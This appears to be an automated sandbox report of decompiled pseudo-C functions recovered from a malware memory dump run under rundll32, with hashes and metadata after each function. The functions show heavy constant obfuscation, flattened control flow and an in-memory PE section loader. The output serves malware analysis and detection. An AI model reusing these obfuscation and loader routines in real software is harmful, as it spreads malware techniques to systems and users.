                                                                                                                    				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x6bf18420;
                                                                                                                    				 *(_t245 + 0x50) = 0xde2575;
                                                                                                                    				 *(_t245 + 0x50) =  *(_t245 + 0x50) >> 0xa;
                                                                                                                    				 *(_t245 + 0x50) =  *(_t245 + 0x50) << 0xe;
                                                                                                                    				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xce6820f5;
                                                                                                                    				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xc3874735;
                                                                                                                    				 *(_t245 + 0x18) = 0x52bd7f;
                                                                                                                    				 *(_t245 + 0x18) =  *(_t245 + 0x18) ^ 0x005e950b;
                                                                                                                    				 *(_t245 + 0x3c) = 0xe72c64;
                                                                                                                    				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) * 0x71;
                                                                                                                    				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) | 0xa2bf1516;
                                                                                                                    				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) ^ 0xe6bf08bc;
                                                                                                                    				 *(_t245 + 0x48) = 0x12926a;
                                                                                                                    				 *(_t245 + 0x48) =  *(_t245 + 0x48) | 0xd69b5974;
                                                                                                                    				 *(_t245 + 0x48) =  *(_t245 + 0x48) << 0xc;
                                                                                                                    				 *(_t245 + 0x48) =  *(_t245 + 0x48) ^ 0xbdb2bc40;
                                                                                                                    				 *(_t245 + 0x5c) = 0xf2f3b3;
                                                                                                                    				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) << 3;
                                                                                                                    				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0xffff4add;
                                                                                                                    				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0x5b51;
                                                                                                                    				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) ^ 0x0796f200;
                                                                                                                    				 *(_t245 + 0x64) = 0x250dfe;
                                                                                                                    				 *(_t245 + 0x64) =  *(_t245 + 0x64) << 7;
                                                                                                                    				 *(_t245 + 0x64) =  *(_t245 + 0x64) | 0xde1ed6e5;
                                                                                                                    				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0xc3c6abe4;
                                                                                                                    				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0x1d594f44;
                                                                                                                    				 *(_t245 + 0x68) = 0x1b0053;
                                                                                                                    				_t226 = 0x44;
                                                                                                                    				 *(_t245 + 0x68) =  *(_t245 + 0x68) * 0x1d;
                                                                                                                    				 *(_t245 + 0x68) =  *(_t245 + 0x68) >> 0xa;
                                                                                                                    				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa237b60d;
                                                                                                                    				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa23e8db7;
                                                                                                                    				 *(_t245 + 0x30) = 0x848c63;
                                                                                                                    				_t142 = _t245 - 0x18; // 0x12da7d1b
                                                                                                                    				 *(_t245 + 0x30) =  *(_t245 + 0x30) / _t226;
                                                                                                                    				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x3584b77a;
                                                                                                                    				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x35842ad7;
                                                                                                                    				 *(_t245 + 0x28) = 0x69c662;
                                                                                                                    				 *(_t245 + 0x28) =  *(_t245 + 0x28) * 0x1f;
                                                                                                                    				 *(_t245 + 0x28) =  *(_t245 + 0x28) ^ 0x0ccd1c29;
                                                                                                                    				 *(_t245 + 0x20) = 0x70b48b;
                                                                                                                    				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xdd83dbf0;
                                                                                                                    				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xddf73f48;
                                                                                                                    				 *(_t245 + 0x1c) = 0x80403c;
                                                                                                                    				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) * 0x1c;
                                                                                                                    				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) ^ 0x0e0dbad6;
                                                                                                                    				_push( *(_t245 + 0x58));
                                                                                                                    				_push( *(_t245 + 0x40));
                                                                                                                    				_t236 = 0x1e;
                                                                                                                    				E00334B61(_t142, _t236);
                                                                                                                    				_t166 = _t245 - 0x220; // 0x12da7b13
                                                                                                                    				E00334B61(_t166, 0x208,  *(_t245 + 0x24),  *(_t245 + 0x34));
                                                                                                                    				_t169 = _t245 - 0x428; // 0x12da790b
                                                                                                                    				E00334B61(_t169, 0x208,  *(_t245 + 0x2c),  *(_t245 + 0x60));
                                                                                                                    				_t171 = _t245 - 0x220; // 0x12da7b13
                                                                                                                    				E00333BC0( *(_t245 + 0x44),  *(_t245 + 0x50), __edx,  *(_t245 + 0x18),  *(_t245 + 0x3c), _t171);
                                                                                                                    				_t176 = _t245 - 0x428; // 0x12da790b
                                                                                                                    				E00333BC0( *(_t245 + 0x48),  *(_t245 + 0x5c),  *((intOrPtr*)(_t245 + 0x78)),  *(_t245 + 0x64),  *(_t245 + 0x68), _t176);
                                                                                                                    				_t183 = _t245 - 0x18; // 0x12da7d1b
                                                                                                                    				 *(_t245 - 0x14) =  *(_t245 + 0x38);
                                                                                                                    				_t185 = _t245 - 0x220; // 0x12da7b13
                                                                                                                    				 *((intOrPtr*)(_t245 - 0x10)) = _t185;
                                                                                                                    				_t187 = _t245 - 0x428; // 0x12da790b
                                                                                                                    				 *((intOrPtr*)(_t245 - 0xc)) = _t187;
                                                                                                                    				 *((short*)(_t245 - 8)) =  *(_t245 + 0x54) |  *(_t245 + 0x4c) | 0x00000410;
                                                                                                                    				_t222 = E00334DDD( *(_t245 + 0x30), _t183,  *(_t245 + 0x28),  *(_t245 + 0x20),  *(_t245 + 0x1c));
                                                                                                                    				asm("sbb eax, eax");
                                                                                                                    				return  ~_t222 + 1;
                                                                                                                    			}










                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: !h$5M$d,
                                                                                                                    • API String ID: 0-3324333736
                                                                                                                    • Opcode ID: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                    • Instruction ID: 333d2b5ad5dd4a879eb0d3e2fa205215d99849f93a41beb8f451c564300066e7
                                                                                                                    • Opcode Fuzzy Hash: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                    • Instruction Fuzzy Hash: F591CEB140038C9BCF59CF65C98A9DE3FB1BB04358F509219FD2A96260D3B5C999CF84
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E0034DEDC(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                                                                                    				char _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				void* _t132;
                                                                                                                    				signed int _t152;
                                                                                                                    				signed int _t154;
                                                                                                                    				signed int _t155;
                                                                                                                    				void* _t158;
                                                                                                                    				signed int* _t175;
                                                                                                                    				void* _t177;
                                                                                                                    				void* _t178;
                                                                                                                    
                                                                                                                    				_push(_a16);
                                                                                                                    				_t174 = _a12;
                                                                                                                    				_t175 = __ecx;
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t132);
                                                                                                                    				_v68 = 0x4bd93;
                                                                                                                    				_t178 = _t177 + 0x18;
                                                                                                                    				_v68 = _v68 << 0xc;
                                                                                                                    				_v68 = _v68 ^ 0x4bd93000;
                                                                                                                    				_t158 = 0xc7349d4;
                                                                                                                    				_v72 = 0xdd086a;
                                                                                                                    				_v72 = _v72 + 0xe602;
                                                                                                                    				_v72 = _v72 ^ 0x00de9932;
                                                                                                                    				_v80 = 0x3b4fac;
                                                                                                                    				_v80 = _v80 | 0x3fbbffff;
                                                                                                                    				_v80 = _v80 ^ 0x3fb1db7a;
                                                                                                                    				_v84 = 0xeaa49b;
                                                                                                                    				_v84 = _v84 | 0xeaf55708;
                                                                                                                    				_v84 = _v84 ^ 0x8a8b7318;
                                                                                                                    				_v84 = _v84 ^ 0x607b886d;
                                                                                                                    				_v88 = 0x47a;
                                                                                                                    				_v88 = _v88 << 0x10;
                                                                                                                    				_v88 = _v88 << 7;
                                                                                                                    				_v88 = _v88 ^ 0x3d0d9eb4;
                                                                                                                    				_v92 = 0xf1af5e;
                                                                                                                    				_v92 = _v92 >> 0xc;
                                                                                                                    				_t154 = 0x35;
                                                                                                                    				_v92 = _v92 * 0x55;
                                                                                                                    				_v92 = _v92 ^ 0x000492d7;
                                                                                                                    				_v104 = 0x9f0b47;
                                                                                                                    				_v104 = _v104 + 0xffffc934;
                                                                                                                    				_v104 = _v104 ^ 0x723421f7;
                                                                                                                    				_v104 = _v104 | 0x7192d654;
                                                                                                                    				_v104 = _v104 ^ 0x73b08a7e;
                                                                                                                    				_v100 = 0x1207d9;
                                                                                                                    				_v100 = _v100 + 0x7e1b;
                                                                                                                    				_v100 = _v100 | 0x7b677906;
                                                                                                                    				_v100 = _v100 * 0xf;
                                                                                                                    				_v100 = _v100 ^ 0x3c0b4b50;
                                                                                                                    				_v60 = 0x5b441e;
                                                                                                                    				_v60 = _v60 ^ 0x5c22d9cd;
                                                                                                                    				_v60 = _v60 ^ 0x5c7ef938;
                                                                                                                    				_v64 = 0xefe367;
                                                                                                                    				_v64 = _v64 + 0x4581;
                                                                                                                    				_v64 = _v64 ^ 0x00f6697a;
                                                                                                                    				_v76 = 0x71c375;
                                                                                                                    				_t155 = 0x14;
                                                                                                                    				_v76 = _v76 / _t154;
                                                                                                                    				_v76 = _v76 + 0xaf56;
                                                                                                                    				_v76 = _v76 ^ 0x000ba048;
                                                                                                                    				_v48 = 0x1a9f92;
                                                                                                                    				_v48 = _v48 + 0x9d50;
                                                                                                                    				_v48 = _v48 ^ 0x001d37d0;
                                                                                                                    				_v52 = 0xf5c688;
                                                                                                                    				_v52 = _v52 + 0xffff5f34;
                                                                                                                    				_v52 = _v52 ^ 0x00ffa10c;
                                                                                                                    				_v56 = 0x3cec64;
                                                                                                                    				_v56 = _v56 ^ 0x003949c0;
                                                                                                                    				_v96 = 0x7057ec;
                                                                                                                    				_v96 = _v96 * 0x35;
                                                                                                                    				_v96 = _v96 | 0xca3e56e5;
                                                                                                                    				_v96 = _v96 / _t155;
                                                                                                                    				_v96 = _v96 ^ 0x0b2d80e0;
                                                                                                                    				do {
                                                                                                                    					while(_t158 != 0x254c3a7) {
                                                                                                                    						if(_t158 == 0x324cad4) {
                                                                                                                    							E00340DAF(_v100,  &_v44, _v60,  *_t174, _v64, _v76);
                                                                                                                    							_t178 = _t178 + 0x10;
                                                                                                                    							_t158 = 0xd972b83;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t158 == 0xc7349d4) {
                                                                                                                    								_t158 = 0x254c3a7;
                                                                                                                    								 *_t175 =  *_t175 & 0x00000000;
                                                                                                                    								_t175[1] = _v68;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								if(_t158 == 0xd972b83) {
                                                                                                                    									E00350E3A( &_v44, _v48, __eflags, _v52, _v56, _v96, _t174 + 4);
                                                                                                                    								} else {
                                                                                                                    									if(_t158 == 0xecd5bc1) {
                                                                                                                    										_push(_t158);
                                                                                                                    										_push(_t158);
                                                                                                                    										_t152 = E00337FF2(_t175[1]);
                                                                                                                    										 *_t175 = _t152;
                                                                                                                    										__eflags = _t152;
                                                                                                                    										if(__eflags != 0) {
                                                                                                                    											_t158 = 0xfbc7198;
                                                                                                                    											continue;
                                                                                                                    										}
                                                                                                                    									} else {
                                                                                                                    										if(_t158 != 0xfbc7198) {
                                                                                                                    											goto L13;
                                                                                                                    										} else {
                                                                                                                    											E00333DBC( &_v44, _t175, _v88, _v92, _v104);
                                                                                                                    											_t178 = _t178 + 0xc;
                                                                                                                    											_t158 = 0x324cad4;
                                                                                                                    											continue;
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L16:
                                                                                                                    						__eflags =  *_t175;
                                                                                                                    						_t131 =  *_t175 != 0;
                                                                                                                    						__eflags = _t131;
                                                                                                                    						return 0 | _t131;
                                                                                                                    					}
                                                                                                                    					_t175[1] = E0034AC3A(_t174);
                                                                                                                    					_t158 = 0xecd5bc1;
                                                                                                                    					L13:
                                                                                                                    					__eflags = _t158 - 0x72dd7bf;
                                                                                                                    				} while (__eflags != 0);
                                                                                                                    				goto L16;
                                                                                                                    			}




























                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: d<$g$Wp
                                                                                                                    • API String ID: 0-355099142
                                                                                                                    • Opcode ID: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                    • Instruction ID: bccee8c850b3808b4bc29f71aff8678a5048a6f387f42489c23d77ccaf927a75
                                                                                                                    • Opcode Fuzzy Hash: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                    • Instruction Fuzzy Hash: DB7122B10093419FD769CF61C48982BBBF1FBC9748F50891DF29A9A220D3769A49CF47
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E0034C3A0(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                                                                    				signed int _v4;
                                                                                                                    				intOrPtr _v8;
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				void* _t137;
                                                                                                                    				void* _t149;
                                                                                                                    				void* _t159;
                                                                                                                    				void* _t161;
                                                                                                                    				signed int _t163;
                                                                                                                    				signed int _t164;
                                                                                                                    				signed int _t165;
                                                                                                                    				signed int _t166;
                                                                                                                    				signed int _t167;
                                                                                                                    				void* _t188;
                                                                                                                    				void* _t193;
                                                                                                                    				intOrPtr* _t195;
                                                                                                                    				signed int* _t197;
                                                                                                                    				signed int* _t198;
                                                                                                                    				signed int* _t199;
                                                                                                                    
                                                                                                                    				_push(_a16);
                                                                                                                    				_t195 = __ecx;
                                                                                                                    				_push(0);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t137);
                                                                                                                    				_v4 = _v4 & 0x00000000;
                                                                                                                    				_v12 = 0x8437e8;
                                                                                                                    				_v8 = 0xdb9720;
                                                                                                                    				_v60 = 0xf5e956;
                                                                                                                    				_v60 = _v60 << 0xc;
                                                                                                                    				_t163 = 0x6b;
                                                                                                                    				_v60 = _v60 / _t163;
                                                                                                                    				_v60 = _v60 | 0x488cc8ef;
                                                                                                                    				_v60 = _v60 ^ 0x48eedbff;
                                                                                                                    				_v44 = 0x82c5a5;
                                                                                                                    				_v44 = _v44 | 0x04b6a6f1;
                                                                                                                    				_t164 = 0x4a;
                                                                                                                    				_v44 = _v44 * 0x6a;
                                                                                                                    				_v44 = _v44 ^ 0xf3bc2b72;
                                                                                                                    				_v40 = 0x882fad;
                                                                                                                    				_v40 = _v40 ^ 0x709d76bd;
                                                                                                                    				_v40 = _v40 + 0xffff52d2;
                                                                                                                    				_v40 = _v40 ^ 0x7014aba2;
                                                                                                                    				_v28 = 0x22e756;
                                                                                                                    				_v28 = _v28 + 0x769a;
                                                                                                                    				_v28 = _v28 ^ 0x002bcc4a;
                                                                                                                    				_v64 = 0xc290d0;
                                                                                                                    				_v64 = _v64 + 0xffff641a;
                                                                                                                    				_v64 = _v64 << 0xd;
                                                                                                                    				_v64 = _v64 ^ 0xbd78a131;
                                                                                                                    				_v64 = _v64 ^ 0x83ed8c94;
                                                                                                                    				_v32 = 0x78b1b0;
                                                                                                                    				_v32 = _v32 << 0xe;
                                                                                                                    				_v32 = _v32 ^ 0x2c621b2d;
                                                                                                                    				_v36 = 0xa1b61f;
                                                                                                                    				_v36 = _v36 + 0xb017;
                                                                                                                    				_v36 = _v36 | 0xc1836c3e;
                                                                                                                    				_v36 = _v36 ^ 0xc1a0ee75;
                                                                                                                    				_v56 = 0x2861cb;
                                                                                                                    				_v56 = _v56 / _t164;
                                                                                                                    				_v56 = _v56 << 0xd;
                                                                                                                    				_t165 = 0x1b;
                                                                                                                    				_v56 = _v56 / _t165;
                                                                                                                    				_v56 = _v56 ^ 0x00aa9f16;
                                                                                                                    				_v24 = 0x4a8582;
                                                                                                                    				_v24 = _v24 | 0x39704e96;
                                                                                                                    				_v24 = _v24 ^ 0x397cf0ca;
                                                                                                                    				_v52 = 0x9fdf3f;
                                                                                                                    				_v52 = _v52 | 0x733ecb9c;
                                                                                                                    				_v52 = _v52 >> 0x10;
                                                                                                                    				_t166 = 0x2c;
                                                                                                                    				_v52 = _v52 / _t166;
                                                                                                                    				_v52 = _v52 ^ 0x0002453b;
                                                                                                                    				_v20 = 0x70cd9;
                                                                                                                    				_v20 = _v20 ^ 0x0384d77a;
                                                                                                                    				_v20 = _v20 ^ 0x03811849;
                                                                                                                    				_v16 = 0x6ca56e;
                                                                                                                    				_v16 = _v16 * 0x1c;
                                                                                                                    				_v16 = _v16 ^ 0x0be055d0;
                                                                                                                    				_v48 = 0x383b50;
                                                                                                                    				_v48 = _v48 + 0xe78c;
                                                                                                                    				_v48 = _v48 + 0x7960;
                                                                                                                    				_v48 = _v48 + 0xffff251b;
                                                                                                                    				_v48 = _v48 ^ 0x003eca00;
                                                                                                                    				_t167 = _v28;
                                                                                                                    				_t149 = E0033474F(_t167, __ecx, _v64, _v32);
                                                                                                                    				_t159 = _t149;
                                                                                                                    				_t197 =  &(( &_v64)[8]);
                                                                                                                    				if(_t159 != 0) {
                                                                                                                    					_push(_t167);
                                                                                                                    					_t188 = E0033A3A3( *((intOrPtr*)(_t159 + 0x50)), _v36, _v56, _v24, _v40, _v44 | _v60);
                                                                                                                    					_t198 =  &(_t197[5]);
                                                                                                                    					if(_t188 == 0) {
                                                                                                                    						L6:
                                                                                                                    						return _t188;
                                                                                                                    					}
                                                                                                                    					E0033ED7E(_v52, _t188, _v20,  *__ecx,  *((intOrPtr*)(_t159 + 0x54)));
                                                                                                                    					_t199 =  &(_t198[3]);
                                                                                                                    					_t193 = ( *(_t159 + 0x14) & 0x0000ffff) + 0x18 + _t159;
                                                                                                                    					_t161 = ( *(_t159 + 6) & 0x0000ffff) * 0x28 + _t193;
                                                                                                                    					while(_t193 < _t161) {
                                                                                                                    						_t157 =  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10));
                                                                                                                    						E0033ED7E(_v16,  *((intOrPtr*)(_t193 + 0xc)) + _t188, _v48,  *((intOrPtr*)(_t193 + 0x14)) +  *_t195,  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10)));
                                                                                                                    						_t199 =  &(_t199[3]);
                                                                                                                    						_t193 = _t193 + 0x28;
                                                                                                                    					}
                                                                                                                    					goto L6;
                                                                                                                    				}
                                                                                                                    				return _t149;
                                                                                                                    			}



































                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P;8$V"$`y
                                                                                                                    • API String ID: 0-4109183828
                                                                                                                    • Opcode ID: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                    • Instruction ID: 11e290ba2e8c4ebc9438343e2ba6b00a979c71e0e228d29da16f37e50b49dc34
                                                                                                                    • Opcode Fuzzy Hash: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                    • Instruction Fuzzy Hash: 5F6145B15183409FC354CF66C88991BBBF1FBC9718F108A1CF69A9A260D7B6D919CF06
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E00331A56(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                    				char _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				void* _t86;
                                                                                                                    				void* _t100;
                                                                                                                    				void* _t101;
                                                                                                                    				void* _t103;
                                                                                                                    				void* _t115;
                                                                                                                    				void* _t116;
                                                                                                                    				signed int _t117;
                                                                                                                    				void* _t119;
                                                                                                                    				void* _t120;
                                                                                                                    
                                                                                                                    				_push(_a8);
                                                                                                                    				_t115 = __edx;
                                                                                                                    				_t101 = __ecx;
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t86);
                                                                                                                    				_v72 = 0xccde8a;
                                                                                                                    				_t120 = _t119 + 0x10;
                                                                                                                    				_v72 = _v72 | 0xfb673ead;
                                                                                                                    				_v72 = _v72 + 0xedb6;
                                                                                                                    				_t116 = 0;
                                                                                                                    				_v72 = _v72 + 0xffff76c0;
                                                                                                                    				_t103 = 0x3303944;
                                                                                                                    				_v72 = _v72 ^ 0xfbf43e98;
                                                                                                                    				_v48 = 0xd56f6c;
                                                                                                                    				_v48 = _v48 ^ 0x96c3cc23;
                                                                                                                    				_v48 = _v48 ^ 0x96174539;
                                                                                                                    				_v76 = 0xdcf6fd;
                                                                                                                    				_v76 = _v76 + 0xffffee01;
                                                                                                                    				_t117 = 0x65;
                                                                                                                    				_v76 = _v76 * 0x23;
                                                                                                                    				_v76 = _v76 + 0xffff4e11;
                                                                                                                    				_v76 = _v76 ^ 0x1e3c7761;
                                                                                                                    				_v80 = 0x144f78;
                                                                                                                    				_v80 = _v80 * 0x39;
                                                                                                                    				_v80 = _v80 ^ 0xe273dc44;
                                                                                                                    				_v80 = _v80 >> 5;
                                                                                                                    				_v80 = _v80 ^ 0x073b5be1;
                                                                                                                    				_v52 = 0xb4a3bb;
                                                                                                                    				_v52 = _v52 ^ 0x916b14c7;
                                                                                                                    				_v52 = _v52 ^ 0x91dd676b;
                                                                                                                    				_v68 = 0x8d73f0;
                                                                                                                    				_v68 = _v68 >> 0xe;
                                                                                                                    				_v68 = _v68 * 0x1c;
                                                                                                                    				_v68 = _v68 ^ 0x0000c864;
                                                                                                                    				_v56 = 0xe6cb06;
                                                                                                                    				_v56 = _v56 >> 4;
                                                                                                                    				_v56 = _v56 | 0x1af2f565;
                                                                                                                    				_v56 = _v56 ^ 0x1af384df;
                                                                                                                    				_v60 = 0x4f2325;
                                                                                                                    				_t55 =  &_v60; // 0x4f2325
                                                                                                                    				_v60 =  *_t55 * 0x78;
                                                                                                                    				_t57 =  &_v60; // 0x4f2325
                                                                                                                    				_v60 =  *_t57 / _t117;
                                                                                                                    				_v60 = _v60 ^ 0x0059a097;
                                                                                                                    				_v64 = 0xa290a2;
                                                                                                                    				_v64 = _v64 >> 4;
                                                                                                                    				_v64 = _v64 + 0x6f89;
                                                                                                                    				_v64 = _v64 ^ 0x00044b6b;
                                                                                                                    				while(_t103 != 0x3303944) {
                                                                                                                    					if(_t103 == 0x5a97fa2) {
                                                                                                                    						__eflags = E0034D97D( &_v44, _v56, __eflags, _v60, _t115 + 0x30, _v64);
                                                                                                                    						_t116 =  !=  ? 1 : _t116;
                                                                                                                    					} else {
                                                                                                                    						if(_t103 == 0xa5a4144) {
                                                                                                                    							E00333DBC( &_v44, _t101, _v72, _v48, _v76);
                                                                                                                    							_t120 = _t120 + 0xc;
                                                                                                                    							_t103 = 0xf0cd209;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t103 != 0xf0cd209) {
                                                                                                                    								L9:
                                                                                                                    								__eflags = _t103 - 0x1b06c67;
                                                                                                                    								if(__eflags != 0) {
                                                                                                                    									continue;
                                                                                                                    								} else {
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								_t100 = E00332A21(_v80, _v52,  &_v44, _t115 + 0x38, _v68);
                                                                                                                    								_t120 = _t120 + 0xc;
                                                                                                                    								if(_t100 != 0) {
                                                                                                                    									_t103 = 0x5a97fa2;
                                                                                                                    									continue;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					return _t116;
                                                                                                                    				}
                                                                                                                    				_t103 = 0xa5a4144;
                                                                                                                    				goto L9;
                                                                                                                    			}























                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %#O$DAZ$DAZ
                                                                                                                    • API String ID: 0-2081751441
                                                                                                                    • Opcode ID: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                    • Instruction ID: 723928b74d78bd8f429957c42dafcc61e965476906e40984e0ee04f59008c421
                                                                                                                    • Opcode Fuzzy Hash: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                    • Instruction Fuzzy Hash: 5E5164725083019FC759CF25D98A82FBBE1FBD8708F501A2DF586A6220D375CA098B87
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E00350C14(void* __ecx) {
                                                                                                                    				signed int _v4;
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				void* _t111;
                                                                                                                    				void* _t115;
                                                                                                                    				void* _t116;
                                                                                                                    				signed int _t118;
                                                                                                                    				void* _t124;
                                                                                                                    				void* _t125;
                                                                                                                    				signed int* _t127;
                                                                                                                    
                                                                                                                    				_t127 =  &_v44;
                                                                                                                    				_t116 = __ecx;
                                                                                                                    				_v24 = 0x2b1199;
                                                                                                                    				_v24 = _v24 + 0x4ba2;
                                                                                                                    				_v24 = _v24 << 0xa;
                                                                                                                    				_v24 = _v24 ^ 0xad737bf1;
                                                                                                                    				_v44 = 0xc9a4fe;
                                                                                                                    				_v44 = _v44 << 0xe;
                                                                                                                    				_v44 = _v44 | 0xe69540e1;
                                                                                                                    				_v44 = _v44 + 0xffffff88;
                                                                                                                    				_v44 = _v44 ^ 0xefbb2da7;
                                                                                                                    				_v28 = 0xedc73;
